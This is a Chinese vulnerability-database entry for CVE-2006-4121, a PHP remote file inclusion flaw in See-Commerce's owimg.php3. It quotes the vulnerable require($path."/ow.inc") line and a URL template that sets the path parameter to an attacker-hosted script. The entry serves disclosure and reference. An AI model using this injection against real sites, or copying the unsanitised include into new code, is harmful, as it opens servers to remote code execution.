See-Commerce 'owimg.php3'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110790 漏洞类型 输入验证
发布时间 2006-08-09 更新时间 2006-08-16
CVE编号 CVE-2006-4121 CNNVD-ID CNNVD-200608-230
漏洞平台 PHP CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/2155
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-230
|漏洞详情
See-Commerce1.0.625及早期版本的owimg.php3存在PHP远程文件包含漏洞,远程攻击者可借助路径参数中的URL执行任意PHP代码。
|漏洞EXP
See-Commerce Remote File Inclusion

CreW: ToXiC

Bug Found by Drago84

Source Code:
http://freshmeat.net/redir/seecommerce/14016/url_zip/sc-1.0.625.zip

Problem Is:
require($path."/ow.inc");

Page Affect:
http://[site]/[see-commerce directory]/owimg.php3?path=[evil script]

Greatz : Str0ke

# milw0rm.com [2006-08-09]
|参考资料

来源:BID
名称:19443
链接:http://www.securityfocus.com/bid/19443
来源:VUPEN
名称:ADV-2006-3233
链接:http://www.frsirt.com/english/advisories/2006/3233
来源:SECUNIA
名称:21460
链接:http://secunia.com/advisories/21460
来源:MILW0RM
名称:2155
链接:http://milw0rm.com/exploits/2155
来源:XF
名称:seecommerce-owimg-file-include(28302)
链接:http://xforce.iss.net/xforce/xfdb/28302